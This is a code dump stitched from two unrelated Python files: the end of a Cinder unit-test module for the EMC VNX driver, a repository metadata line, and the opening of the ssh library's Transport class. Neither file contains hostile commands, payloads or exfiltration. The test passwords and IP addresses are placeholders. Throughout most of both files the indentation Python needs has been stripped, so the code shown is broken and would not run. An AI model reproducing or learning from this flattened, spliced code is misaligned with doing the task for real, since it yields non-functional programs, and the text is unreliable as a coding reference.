cmd_smp = ('lun', '-list', '-name', 'vol2', '-attachedSnapshot')
output_smp = ("""LOGICAL UNIT NUMBER 1
Name: vol2
Attached Snapshot: N/A""", 0)
cmd_dest = self.testData.LUN_PROPERTY_ALL_CMD("vol2_dest")
output_dest = self.testData.LUN_PROPERTY("vol2_dest")
cmd_migrate = self.testData.MIGRATION_CMD(1, 1)
output_migrate = ("", 0)
cmd_migrate_verify = self.testData.MIGRATION_VERIFY_CMD(1)
output_migrate_verify = (r'The specified source LUN '
'is not currently migrating', 23)
commands = [cmd_smp, cmd_dest, cmd_migrate, cmd_migrate_verify]
results = [output_smp, output_dest, output_migrate,
output_migrate_verify]
fake_cli = self.driverSetup(commands, results)
self.driver.create_volume_from_snapshot(
self.testData.volume_in_cg, self.testData.test_member_cgsnapshot)
expect_cmd = [
mock.call(
*self.testData.SNAP_MP_CREATE_CMD(
name='vol2', source='vol1')),
mock.call(
*self.testData.SNAP_ATTACH_CMD(
name='vol2', snapName='cgsnapshot_id')),
mock.call(*self.testData.LUN_CREATION_CMD(
'vol2_dest', 1, 'unit_test_pool', None, None)),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2')),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2_dest')),
mock.call(*self.testData.MIGRATION_CMD(1, 1),
retry_disable=True),
mock.call(*self.testData.MIGRATION_VERIFY_CMD(1)),
mock.call('lun', '-list', '-name', 'vol2', '-attachedSnapshot'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol2'))]
fake_cli.assert_has_calls(expect_cmd)
def succeed_fake_command_execute(self, *command, **kwargv):
return SUCCEED
def fake_get_pool_properties(self, filter_option, properties=None):
pool_info = {'pool_name': "unit_test_pool0",
'total_capacity_gb': 1000.0,
'free_capacity_gb': 1000.0
}
return pool_info
def fake_get_lun_properties(self, filter_option, properties=None):
lun_info = {'lun_name': "vol1",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready"}
return lun_info
def fake_safe_get(self, value):
if value == "storage_vnx_pool_name":
return "unit_test_pool"
elif 'volume_backend_name' == value:
return "namedbackend"
else:
return None
class EMCVNXCLIDriverFCTestCase(test.TestCase):
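    """Unit tests for the EMC VNX Fibre Channel driver (EMCCLIFCDriver)."""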
def setUp(self):
super(EMCVNXCLIDriverFCTestCase, self).setUp()
self.stubs.Set(CommandLineHelper, 'command_execute',
self.succeed_fake_command_execute)
self.stubs.Set(CommandLineHelper, 'get_array_serial',
mock.Mock(return_value={'array_serial':
"fakeSerial"}))
self.stubs.Set(os.path, 'exists', mock.Mock(return_value=1))
self.stubs.Set(emc_vnx_cli, 'INTERVAL_5_SEC', 0.01)
self.stubs.Set(emc_vnx_cli, 'INTERVAL_30_SEC', 0.01)
self.stubs.Set(emc_vnx_cli, 'INTERVAL_60_SEC', 0.01)
self.configuration = conf.Configuration(None)
self.configuration.append_config_values = mock.Mock(return_value=0)
self.configuration.naviseccli_path = '/opt/Navisphere/bin/naviseccli'
self.configuration.san_ip = '10.0.0.1'
self.configuration.storage_vnx_pool_name = 'unit_test_pool'
self.configuration.san_login = 'sysadmin'
self.configuration.san_password = 'sysadmin'
        # set the timeout to 0.012s (0.0002 * 60)
self.configuration.default_timeout = 0.0002
self.configuration.initiator_auto_registration = True
self.configuration.zoning_mode = None
self.stubs.Set(self.configuration, 'safe_get', self.fake_safe_get)
self.testData = EMCVNXCLIDriverTestData()
self.navisecclicmd = '/opt/Navisphere/bin/naviseccli ' + \
'-address 10.0.0.1 -user sysadmin -password sysadmin -scope 0 '
def tearDown(self):
super(EMCVNXCLIDriverFCTestCase, self).tearDown()
def driverSetup(self, commands=tuple(), results=tuple()):
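        """Instantiate the FC driver and wire in a simulated CLI executor."""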
self.driver = EMCCLIFCDriver(configuration=self.configuration)
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.Mock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
return fake_cli
def get_command_execute_simulator(self, commands=tuple(),
results=tuple()):
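        """Build a fake command_execute that returns the canned result for
        each known command and falls back to the standard simulator.
        """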
assert(len(commands) == len(results))
def fake_command_execute(*args, **kwargv):
for i in range(len(commands)):
if args == commands[i]:
if isinstance(results[i], list):
if len(results[i]) > 0:
ret = results[i][0]
del results[i][0]
return ret
else:
return results[i]
return self.standard_fake_command_execute(*args, **kwargv)
return fake_command_execute
def standard_fake_command_execute(self, *args, **kwargv):
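        """Serve default LUN and pool properties when no explicit
        command/result pair matches.
        """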
standard_commands = [
self.testData.LUN_PROPERTY_ALL_CMD('vol1'),
self.testData.LUN_PROPERTY_ALL_CMD('vol2'),
self.testData.LUN_PROPERTY_ALL_CMD('vol-vol1'),
self.testData.LUN_PROPERTY_ALL_CMD('snapshot1'),
self.testData.POOL_PROPERTY_CMD]
standard_results = [
self.testData.LUN_PROPERTY('vol1'),
self.testData.LUN_PROPERTY('vol2'),
self.testData.LUN_PROPERTY('vol-vol1'),
self.testData.LUN_PROPERTY('snapshot1'),
self.testData.POOL_PROPERTY]
standard_default = SUCCEED
for i in range(len(standard_commands)):
if args == standard_commands[i]:
return standard_results[i]
return standard_default
def succeed_fake_command_execute(self, *command, **kwargv):
return SUCCEED
def fake_get_pool_properties(self, filter_option, properties=None):
pool_info = {'pool_name': "unit_test_pool0",
'total_capacity_gb': 1000.0,
'free_capacity_gb': 1000.0
}
return pool_info
def fake_get_lun_properties(self, filter_option, properties=None):
lun_info = {'lun_name': "vol1",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready"}
return lun_info
def fake_safe_get(self, value):
if value == "storage_vnx_pool_name":
return "unit_test_pool"
elif 'volume_backend_name' == value:
return "namedbackend"
else:
return None
@mock.patch(
"oslo_concurrency.processutils.execute",
mock.Mock(
return_value=(
"fakeportal iqn.1992-04.fake.com:fake.apm00123907237.a8", 0)))
@mock.patch("random.shuffle", mock.Mock())
def test_initialize_connection_fc_auto_reg(self):
# Test for auto registration
self.configuration.initiator_auto_registration = True
commands = [('storagegroup', '-list', '-gname', 'fakehost'),
('storagegroup', '-list'),
self.testData.GETFCPORT_CMD(),
('port', '-list', '-gname', 'fakehost')]
results = [[("No group", 83),
self.testData.STORAGE_GROUP_NO_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost')],
self.testData.STORAGE_GROUP_HAS_MAP('fakehost'),
self.testData.FC_PORTS,
self.testData.FAKEHOST_PORTS]
fake_cli = self.driverSetup(commands, results)
data = self.driver.initialize_connection(
self.testData.test_volume,
self.testData.connector)
self.assertEqual(data['data']['access_mode'], 'ro')
expected = [
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-create', '-gname', 'fakehost'),
mock.call('storagegroup', '-list'),
mock.call('port', '-list', '-sp'),
mock.call('storagegroup', '-gname', 'fakehost',
'-setpath', '-hbauid',
'22:34:56:78:90:12:34:56:12:34:56:78:90:12:34:56',
'-sp', 'A', '-spport', '0', '-ip', '10.0.0.2',
'-host', 'fakehost', '-o'),
mock.call('port', '-list', '-sp'),
mock.call('storagegroup', '-gname', 'fakehost',
'-setpath', '-hbauid',
'22:34:56:78:90:54:32:16:12:34:56:78:90:54:32:16',
'-sp', 'A', '-spport', '0', '-ip', '10.0.0.2',
'-host', 'fakehost', '-o'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-addhlu', '-hlu', 1, '-alu', 1,
'-gname', 'fakehost'),
mock.call('port', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('port', '-list', '-sp')]
fake_cli.assert_has_calls(expected)
        # Test for manual registration
self.configuration.initiator_auto_registration = False
commands = [('storagegroup', '-list', '-gname', 'fakehost'),
('storagegroup', '-list'),
self.testData.CONNECTHOST_CMD('fakehost', 'fakehost'),
self.testData.GETFCPORT_CMD(),
('port', '-list', '-gname', 'fakehost')]
results = [[("No group", 83),
self.testData.STORAGE_GROUP_NO_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost')],
self.testData.STORAGE_GROUP_HAS_MAP('fakehost'),
('', 0),
self.testData.FC_PORTS,
self.testData.FAKEHOST_PORTS]
fake_cli = self.driverSetup(commands, results)
data = self.driver.initialize_connection(
self.testData.test_volume_rw,
self.testData.connector)
self.assertEqual(data['data']['access_mode'], 'rw')
expected = [mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-create', '-gname', 'fakehost'),
mock.call('storagegroup', '-connecthost',
'-host', 'fakehost', '-gname', 'fakehost', '-o'),
mock.call(*self.testData.LUN_PROPERTY_ALL_CMD('vol1')),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-addhlu', '-hlu', 1, '-alu', 1,
'-gname', 'fakehost'),
mock.call('port', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('port', '-list', '-sp')]
fake_cli.assert_has_calls(expected)
@mock.patch(
"cinder.zonemanager.fc_san_lookup_service.FCSanLookupService." +
"get_device_mapping_from_network",
mock.Mock(return_value=EMCVNXCLIDriverTestData.device_map))
@mock.patch("random.shuffle", mock.Mock())
def test_initialize_connection_fc_auto_zoning(self):
# Test for auto zoning
self.configuration.zoning_mode = 'fabric'
self.configuration.initiator_auto_registration = False
commands = [('storagegroup', '-list', '-gname', 'fakehost'),
('storagegroup', '-list'),
self.testData.CONNECTHOST_CMD('fakehost', 'fakehost'),
self.testData.GETFCPORT_CMD(),
('port', '-list', '-gname', 'fakehost')]
results = [[("No group", 83),
self.testData.STORAGE_GROUP_NO_MAP('fakehost'),
self.testData.STORAGE_GROUP_HAS_MAP('fakehost')],
self.testData.STORAGE_GROUP_HAS_MAP('fakehost'),
('', 0),
self.testData.FC_PORTS,
self.testData.FAKEHOST_PORTS]
fake_cli = self.driverSetup(commands, results)
self.driver.cli.zonemanager_lookup_service = FCSanLookupService(
configuration=self.configuration)
conn_info = self.driver.initialize_connection(
self.testData.test_volume,
self.testData.connector)
self.assertEqual(conn_info['data']['initiator_target_map'],
EMCVNXCLIDriverTestData.i_t_map)
self.assertEqual(conn_info['data']['target_wwn'],
['1122334455667777'])
expected = [mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-create', '-gname', 'fakehost'),
mock.call('storagegroup', '-connecthost',
'-host', 'fakehost', '-gname', 'fakehost', '-o'),
mock.call('lun', '-list', '-name', 'vol1',
'-state', '-status', '-opDetails',
'-userCap', '-owner', '-attachedSnapshot'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-addhlu', '-hlu', 1, '-alu', 1,
'-gname', 'fakehost'),
mock.call('port', '-list', '-gname', 'fakehost'),
mock.call('storagegroup', '-list', '-gname', 'fakehost'),
mock.call('port', '-list', '-sp')]
fake_cli.assert_has_calls(expected)
@mock.patch(
"cinder.zonemanager.fc_san_lookup_service.FCSanLookupService." +
"get_device_mapping_from_network",
mock.Mock(return_value=EMCVNXCLIDriverTestData.device_map))
def test_terminate_connection_remove_zone_false(self):
self.driver = EMCCLIFCDriver(configuration=self.configuration)
cli_helper = self.driver.cli._client
data = {'storage_group_name': "fakehost",
'storage_group_uid': "2F:D4:00:00:00:00:00:"
"00:00:00:FF:E5:3A:03:FD:6D",
'lunmap': {1: 16, 2: 88, 3: 47}}
cli_helper.get_storage_group = mock.Mock(
return_value=data)
lun_info = {'lun_name': "unit_test_lun",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready"}
cli_helper.get_lun_by_name = mock.Mock(return_value=lun_info)
cli_helper.remove_hlu_from_storagegroup = mock.Mock()
self.driver.cli.zonemanager_lookup_service = FCSanLookupService(
configuration=self.configuration)
connection_info = self.driver.terminate_connection(
self.testData.test_volume,
self.testData.connector)
self.assertFalse('initiator_target_map' in connection_info['data'],
'initiator_target_map should not appear.')
cli_helper.remove_hlu_from_storagegroup.assert_called_once_with(
16, self.testData.connector["host"])
@mock.patch(
"cinder.zonemanager.fc_san_lookup_service.FCSanLookupService." +
"get_device_mapping_from_network",
mock.Mock(return_value=EMCVNXCLIDriverTestData.device_map))
def test_terminate_connection_remove_zone_true(self):
self.driver = EMCCLIFCDriver(configuration=self.configuration)
cli_helper = self.driver.cli._client
data = {'storage_group_name': "fakehost",
'storage_group_uid': "2F:D4:00:00:00:00:00:"
"00:00:00:FF:E5:3A:03:FD:6D",
'lunmap': {}}
cli_helper.get_storage_group = mock.Mock(
return_value=data)
lun_info = {'lun_name': "unit_test_lun",
'lun_id': 1,
'pool': "unit_test_pool",
'attached_snapshot': "N/A",
'owner': "A",
'total_capacity_gb': 1.0,
'state': "Ready"}
cli_helper.get_lun_by_name = mock.Mock(return_value=lun_info)
cli_helper.remove_hlu_from_storagegroup = mock.Mock()
self.driver.cli.zonemanager_lookup_service = FCSanLookupService(
configuration=self.configuration)
connection_info = self.driver.terminate_connection(
self.testData.test_volume,
self.testData.connector)
self.assertTrue('initiator_target_map' in connection_info['data'],
'initiator_target_map should be populated.')
self.assertEqual(connection_info['data']['initiator_target_map'],
EMCVNXCLIDriverTestData.i_t_map)
def test_get_volume_stats(self):
#expect_result = [POOL_PROPERTY]
self.driverSetup()
stats = self.driver.get_volume_stats(True)
self.assertTrue(stats['driver_version'] is not None,
"dirver_version is not returned")
self.assertTrue(
stats['free_capacity_gb'] == 1000.6,
"free_capacity_gb is not correct")
self.assertTrue(
stats['reserved_percentage'] == 0,
"reserved_percentage is not correct")
self.assertTrue(
stats['storage_protocol'] == 'FC',
"storage_protocol is not correct")
self.assertTrue(
stats['total_capacity_gb'] == 10000.5,
"total_capacity_gb is not correct")
self.assertTrue(
stats['vendor_name'] == "EMC",
"vender name is not correct")
self.assertTrue(
stats['volume_backend_name'] == "namedbackend",
"volume backend name is not correct")
self.assertTrue(stats['location_info'] == "unit_test_pool|fakeSerial")
self.assertTrue(
stats['driver_version'] == "04.01.00",
"driver version is incorrect.")
class EMCVNXCLIToggleSPTestData():
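    """Builds the naviseccli command prefix for a given SP address."""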
def FAKE_COMMAND_PREFIX(self, sp_address):
return ('/opt/Navisphere/bin/naviseccli', '-address', sp_address,
'-user', 'sysadmin', '-password', 'sysadmin',
'-scope', 'global')
class EMCVNXCLIToggleSPTestCase(test.TestCase):
def setUp(self):
super(EMCVNXCLIToggleSPTestCase, self).setUp()
self.stubs.Set(os.path, 'exists', mock.Mock(return_value=1))
self.configuration = mock.Mock(conf.Configuration)
self.configuration.naviseccli_path = '/opt/Navisphere/bin/naviseccli'
self.configuration.san_ip = '10.10.10.10'
self.configuration.san_secondary_ip = "10.10.10.11"
self.configuration.storage_vnx_pool_name = 'unit_test_pool'
self.configuration.san_login = 'sysadmin'
self.configuration.san_password = 'sysadmin'
self.configuration.default_timeout = 1
self.configuration.max_luns_per_storage_group = 10
self.configuration.destroy_empty_storage_group = 10
self.configuration.storage_vnx_authentication_type = "global"
self.configuration.iscsi_initiators = '{"fakehost": ["10.0.0.2"]}'
self.configuration.zoning_mode = None
self.configuration.storage_vnx_security_file_dir = ""
self.cli_client = emc_vnx_cli.CommandLineHelper(
configuration=self.configuration)
self.test_data = EMCVNXCLIToggleSPTestData()
def tearDown(self):
super(EMCVNXCLIToggleSPTestCase, self).tearDown()
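    # The tests below drive CommandLineHelper.command_execute through a mocked
    # cinder.utils.execute.  A ProcessExecutionError whose output matches one
    # of the recognized naviseccli connection failures is expected to make the
    # helper retry the same command against the secondary SP
    # (san_secondary_ip) and flip active_storage_ip accordingly; a clean
    # result should leave the active SP untouched.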
def test_no_sp_toggle(self):
self.cli_client.active_storage_ip = '10.10.10.10'
FAKE_SUCCESS_RETURN = ('success', 0)
FAKE_COMMAND = ('list', 'pool')
SIDE_EFFECTS = [FAKE_SUCCESS_RETURN, FAKE_SUCCESS_RETURN]
with mock.patch('cinder.utils.execute') as mock_utils:
mock_utils.side_effect = SIDE_EFFECTS
self.cli_client.command_execute(*FAKE_COMMAND)
self.assertEqual(self.cli_client.active_storage_ip, "10.10.10.10")
expected = [mock.call(*('ping', '-c', 1, '10.10.10.10'),
check_exit_code=True),
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.10')
+ FAKE_COMMAND),
check_exit_code=True)]
mock_utils.assert_has_calls(expected)
    def test_toggle_sp_with_server_unavailable(self):
self.cli_client.active_storage_ip = '10.10.10.10'
FAKE_ERROR_MSG = """\
Error occurred during HTTP request/response from the target: '10.244.213.142'.
Message : HTTP/1.1 503 Service Unavailable"""
FAKE_SUCCESS_RETURN = ('success', 0)
FAKE_COMMAND = ('list', 'pool')
SIDE_EFFECTS = [FAKE_SUCCESS_RETURN,
processutils.ProcessExecutionError(
exit_code=255, stdout=FAKE_ERROR_MSG),
FAKE_SUCCESS_RETURN]
with mock.patch('cinder.utils.execute') as mock_utils:
mock_utils.side_effect = SIDE_EFFECTS
self.cli_client.command_execute(*FAKE_COMMAND)
self.assertEqual(self.cli_client.active_storage_ip, "10.10.10.11")
expected = [
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.10')
+ FAKE_COMMAND),
check_exit_code=True),
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.11')
+ FAKE_COMMAND),
check_exit_code=True)]
mock_utils.assert_has_calls(expected)
def test_toggle_sp_with_end_of_data(self):
self.cli_client.active_storage_ip = '10.10.10.10'
FAKE_ERROR_MSG = """\
Error occurred during HTTP request/response from the target: '10.244.213.142'.
Message : End of data stream"""
FAKE_SUCCESS_RETURN = ('success', 0)
FAKE_COMMAND = ('list', 'pool')
SIDE_EFFECTS = [FAKE_SUCCESS_RETURN,
processutils.ProcessExecutionError(
exit_code=255, stdout=FAKE_ERROR_MSG),
FAKE_SUCCESS_RETURN]
with mock.patch('cinder.utils.execute') as mock_utils:
mock_utils.side_effect = SIDE_EFFECTS
self.cli_client.command_execute(*FAKE_COMMAND)
self.assertEqual(self.cli_client.active_storage_ip, "10.10.10.11")
expected = [
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.10')
+ FAKE_COMMAND),
check_exit_code=True),
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.11')
+ FAKE_COMMAND),
check_exit_code=True)]
mock_utils.assert_has_calls(expected)
def test_toggle_sp_with_connection_refused(self):
self.cli_client.active_storage_ip = '10.10.10.10'
FAKE_ERROR_MSG = """\
A network error occurred while trying to connect: '10.244.213.142'.
Message : Error occurred because connection refused. \
Unable to establish a secure connection to the Management Server.
"""
FAKE_SUCCESS_RETURN = ('success', 0)
FAKE_COMMAND = ('list', 'pool')
SIDE_EFFECTS = [FAKE_SUCCESS_RETURN,
processutils.ProcessExecutionError(
exit_code=255, stdout=FAKE_ERROR_MSG),
FAKE_SUCCESS_RETURN]
with mock.patch('cinder.utils.execute') as mock_utils:
mock_utils.side_effect = SIDE_EFFECTS
self.cli_client.command_execute(*FAKE_COMMAND)
self.assertEqual(self.cli_client.active_storage_ip, "10.10.10.11")
expected = [
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.10')
+ FAKE_COMMAND),
check_exit_code=True),
mock.call(
*(self.test_data.FAKE_COMMAND_PREFIX('10.10.10.11')
+ FAKE_COMMAND),
check_exit_code=True)]
mock_utils.assert_has_calls(expected)
|
hguemar/cinder
|
cinder/tests/test_emc_vnxdirect.py
|
Python
|
apache-2.0
| 125,902 | 0.000246 |
# Copyright (C) 2011 Jeff Forcier <jeff@bitprophet.org>
#
# This file is part of ssh.
#
# 'ssh' is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# 'ssh' is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with 'ssh'; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Suite 500, Boston, MA 02110-1335 USA.
"""
L{Transport} handles the core SSH2 protocol.
"""
import os
import socket
import string
import struct
import sys
import threading
import time
import weakref
import ssh
from ssh import util
from ssh.auth_handler import AuthHandler
from ssh.channel import Channel
from ssh.common import *
from ssh.compress import ZlibCompressor, ZlibDecompressor
from ssh.dsskey import DSSKey
from ssh.kex_gex import KexGex
from ssh.kex_group1 import KexGroup1
from ssh.message import Message
from ssh.packet import Packetizer, NeedRekeyException
from ssh.primes import ModulusPack
from ssh.rsakey import RSAKey
from ssh.server import ServerInterface
from ssh.sftp_client import SFTPClient
from ssh.ssh_exception import SSHException, BadAuthenticationType, ChannelException
from ssh.util import retry_on_signal
from Crypto import Random
from Crypto.Cipher import Blowfish, AES, DES3, ARC4
from Crypto.Hash import SHA, MD5
try:
from Crypto.Util import Counter
except ImportError:
from ssh.util import Counter
# for thread cleanup
_active_threads = []
def _join_lingering_threads():
for thr in _active_threads:
thr.stop_thread()
import atexit
atexit.register(_join_lingering_threads)
class SecurityOptions (object):
"""
Simple object containing the security preferences of an ssh transport.
These are tuples of acceptable ciphers, digests, key types, and key
exchange algorithms, listed in order of preference.
Changing the contents and/or order of these fields affects the underlying
L{Transport} (but only if you change them before starting the session).
If you try to add an algorithm that ssh doesn't recognize,
C{ValueError} will be raised. If you try to assign something besides a
tuple to one of the fields, C{TypeError} will be raised.
"""
__slots__ = [ 'ciphers', 'digests', 'key_types', 'kex', 'compression', '_transport' ]
def __init__(self, transport):
self._transport = transport
def __repr__(self):
"""
Returns a string representation of this object, for debugging.
@rtype: str
"""
return '<ssh.SecurityOptions for %s>' % repr(self._transport)
def _get_ciphers(self):
return self._transport._preferred_ciphers
def _get_digests(self):
return self._transport._preferred_macs
def _get_key_types(self):
return self._transport._preferred_keys
def _get_kex(self):
return self._transport._preferred_kex
def _get_compression(self):
return self._transport._preferred_compression
def _set(self, name, orig, x):
if type(x) is list:
x = tuple(x)
if type(x) is not tuple:
raise TypeError('expected tuple or list')
possible = getattr(self._transport, orig).keys()
forbidden = filter(lambda n: n not in possible, x)
if len(forbidden) > 0:
raise ValueError('unknown cipher')
setattr(self._transport, name, x)
def _set_ciphers(self, x):
self._set('_preferred_ciphers', '_cipher_info', x)
def _set_digests(self, x):
self._set('_preferred_macs', '_mac_info', x)
def _set_key_types(self, x):
self._set('_preferred_keys', '_key_info', x)
def _set_kex(self, x):
self._set('_preferred_kex', '_kex_info', x)
def _set_compression(self, x):
self._set('_preferred_compression', '_compression_info', x)
ciphers = property(_get_ciphers, _set_ciphers, None,
"Symmetric encryption ciphers")
digests = property(_get_digests, _set_digests, None,
"Digest (one-way hash) algorithms")
key_types = property(_get_key_types, _set_key_types, None,
"Public-key algorithms")
kex = property(_get_kex, _set_kex, None, "Key exchange algorithms")
compression = property(_get_compression, _set_compression, None,
"Compression algorithms")
class ChannelMap (object):
def __init__(self):
# (id -> Channel)
self._map = weakref.WeakValueDictionary()
self._lock = threading.Lock()
def put(self, chanid, chan):
self._lock.acquire()
try:
self._map[chanid] = chan
finally:
self._lock.release()
def get(self, chanid):
self._lock.acquire()
try:
return self._map.get(chanid, None)
finally:
self._lock.release()
def delete(self, chanid):
self._lock.acquire()
try:
try:
del self._map[chanid]
except KeyError:
pass
finally:
self._lock.release()
def values(self):
self._lock.acquire()
try:
return self._map.values()
finally:
self._lock.release()
def __len__(self):
self._lock.acquire()
try:
return len(self._map)
finally:
self._lock.release()
class Transport (threading.Thread):
"""
An SSH Transport attaches to a stream (usually a socket), negotiates an
encrypted session, authenticates, and then creates stream tunnels, called
L{Channel}s, across the session. Multiple channels can be multiplexed
across a single session (and often are, in the case of port forwardings).
"""
_PROTO_ID = '2.0'
_CLIENT_ID = 'ssh_%s' % (ssh.__version__)
_preferred_ciphers = ( 'aes128-ctr', 'aes256-ctr', 'aes128-cbc', 'blowfish-cbc', 'aes256-cbc', '3des-cbc',
'arcfour128', 'arcfour256' )
_preferred_macs = ( 'hmac-sha1', 'hmac-md5', 'hmac-sha1-96', 'hmac-md5-96' )
_preferred_keys = ( 'ssh-rsa', 'ssh-dss' )
_preferred_kex = ( 'diffie-hellman-group1-sha1', 'diffie-hellman-group-exchange-sha1' )
_preferred_compression = ( 'none', )
_cipher_info = {
'aes128-ctr': { 'class': AES, 'mode': AES.MODE_CTR, 'block-size': 16, 'key-size': 16 },
'aes256-ctr': { 'class': AES, 'mode': AES.MODE_CTR, 'block-size': 16, 'key-size': 32 },
'blowfish-cbc': { 'class': Blowfish, 'mode': Blowfish.MODE_CBC, 'block-size': 8, 'key-size': 16 },
'aes128-cbc': { 'class': AES, 'mode': AES.MODE_CBC, 'block-size': 16, 'key-size': 16 },
'aes256-cbc': { 'class': AES, 'mode': AES.MODE_CBC, 'block-size': 16, 'key-size': 32 },
'3des-cbc': { 'class': DES3, 'mode': DES3.MODE_CBC, 'block-size': 8, 'key-size': 24 },
'arcfour128': { 'class': ARC4, 'mode': None, 'block-size': 8, 'key-size': 16 },
'arcfour256': { 'class': ARC4, 'mode': None, 'block-size': 8, 'key-size': 32 },
}
_mac_info = {
'hmac-sha1': { 'class': SHA, 'size': 20 },
'hmac-sha1-96': { 'class': SHA, 'size': 12 },
'hmac-md5': { 'class': MD5, 'size': 16 },
'hmac-md5-96': { 'class': MD5, 'size': 12 },
}
_key_info = {
'ssh-rsa': RSAKey,
'ssh-dss': DSSKey,
}
_kex_info = {
'diffie-hellman-group1-sha1': KexGroup1,
'diffie-hellman-group-exchange-sha1': KexGex,
}
_compression_info = {
# zlib@openssh.com is just zlib, but only turned on after a successful
# authentication. openssh servers may only offer this type because
# they've had troubles with security holes in zlib in the past.
'zlib@openssh.com': ( ZlibCompressor, ZlibDecompressor ),
'zlib': ( ZlibCompressor, ZlibDecompressor ),
'none': ( None, None ),
}
_modulus_pack = None
def __init__(self, sock):
"""
Create a new SSH session over an existing socket, or socket-like
object. This only creates the Transport object; it doesn't begin the
SSH session yet. Use L{connect} or L{start_client} to begin a client
session, or L{start_server} to begin a server session.
If the object is not actually a socket, it must have the following
methods:
- C{send(str)}: Writes from 1 to C{len(str)} bytes, and
returns an int representing the number of bytes written. Returns
0 or raises C{EOFError} if the stream has been closed.
- C{recv(int)}: Reads from 1 to C{int} bytes and returns them as a
string. Returns 0 or raises C{EOFError} if the stream has been
closed.
- C{close()}: Closes the socket.
- C{settimeout(n)}: Sets a (float) timeout on I/O operations.
For ease of use, you may also pass in an address (as a tuple) or a host
string as the C{sock} argument. (A host string is a hostname with an
optional port (separated by C{":"}) which will be converted into a
tuple of C{(hostname, port)}.) A socket will be connected to this
address and used for communication. Exceptions from the C{socket} call
may be thrown in this case.
@param sock: a socket or socket-like object to create the session over.
@type sock: socket
"""
if isinstance(sock, (str, unicode)):
# convert "host:port" into (host, port)
hl = sock.split(':', 1)
if len(hl) == 1:
sock = (hl[0], 22)
else:
sock = (hl[0], int(hl[1]))
if type(sock) is tuple:
# connect to the given (host, port)
hostname, port = sock
reason = 'No suitable address family'
for (family, socktype, proto, canonname, sockaddr) in socket.getaddrinfo(hostname, port, socket.AF_UNSPEC, socket.SOCK_STREAM):
if socktype == socket.SOCK_STREAM:
af = family
addr = sockaddr
sock = socket.socket(af, socket.SOCK_STREAM)
try:
retry_on_signal(lambda: sock.connect((hostname, port)))
except socket.error, e:
reason = str(e)
else:
break
else:
raise SSHException(
'Unable to connect to %s: %s' % (hostname, reason))
# okay, normal socket-ish flow here...
threading.Thread.__init__(self)
self.setDaemon(True)
self.rng = rng
self.sock = sock
# Python < 2.3 doesn't have the settimeout method - RogerB
try:
# we set the timeout so we can check self.active periodically to
# see if we should bail. socket.timeout exception is never
# propagated.
self.sock.settimeout(0.1)
except AttributeError:
pass
# negotiated crypto parameters
self.packetizer = Packetizer(sock)
self.local_version = 'SSH-' + self._PROTO_ID + '-' + self._CLIENT_ID
self.remote_version = ''
self.local_cipher = self.remote_cipher = ''
self.local_kex_init = self.remote_kex_init = None
self.local_mac = self.remote_mac = None
self.local_compression = self.remote_compression = None
self.session_id = None
self.host_key_type = None
self.host_key = None
# state used during negotiation
self.kex_engine = None
self.H = None
self.K = None
self.active = False
self.initial_kex_done = False
self.in_kex = False
self.authenticated = False
self._expected_packet = tuple()
self.lock = threading.Lock() # synchronization (always higher level than write_lock)
# tracking open channels
self._channels = ChannelMap()
self.channel_events = { } # (id -> Event)
self.channels_seen = { } # (id -> True)
self._channel_counter = 1
self.window_size = 65536
self.max_packet_size = 34816
self._forward_agent_handler = None
self._x11_handler = None
self._tcp_handler = None
self.saved_exception = None
self.clear_to_send = threading.Event()
self.clear_to_send_lock = threading.Lock()
self.clear_to_send_timeout = 30.0
self.log_name = 'ssh.transport'
self.logger = util.get_logger(self.log_name)
self.packetizer.set_log(self.logger)
self.auth_handler = None
self.global_response = None # response Message from an arbitrary global request
self.completion_event = None # user-defined event callbacks
self.banner_timeout = 15 # how long (seconds) to wait for the SSH banner
# server mode:
self.server_mode = False
self.server_object = None
self.server_key_dict = { }
self.server_accepts = [ ]
self.server_accept_cv = threading.Condition(self.lock)
self.subsystem_table = { }
def __repr__(self):
"""
Returns a string representation of this object, for debugging.
@rtype: str
"""
